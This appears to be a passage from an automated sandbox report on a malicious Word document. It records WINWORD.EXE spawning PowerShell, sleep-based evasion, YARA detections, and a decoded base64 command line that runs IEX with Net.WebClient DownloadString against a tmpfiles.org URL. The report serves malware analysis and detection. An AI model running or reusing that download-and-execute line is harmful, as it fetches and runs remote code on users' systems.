Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6006			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3737			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1268

Thread sleep time: -11990383647911201s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: powershell.exe, 00000007.00000002.2138446606.0000000006D4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.2138446606.0000000006D4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSFT_NetEventVmNetworkAdatper.cdxml.f
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.2138887774.0000000006DB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6980.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6980, type: MEMORYSTR

Encrypted powershell cmdline option found

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: Base64 decoded IEX (New-Object Net.WebClient).DownloadString('https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhj
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: Base64 decoded IEX (New-Object Net.WebClient).DownloadString('https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhj			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
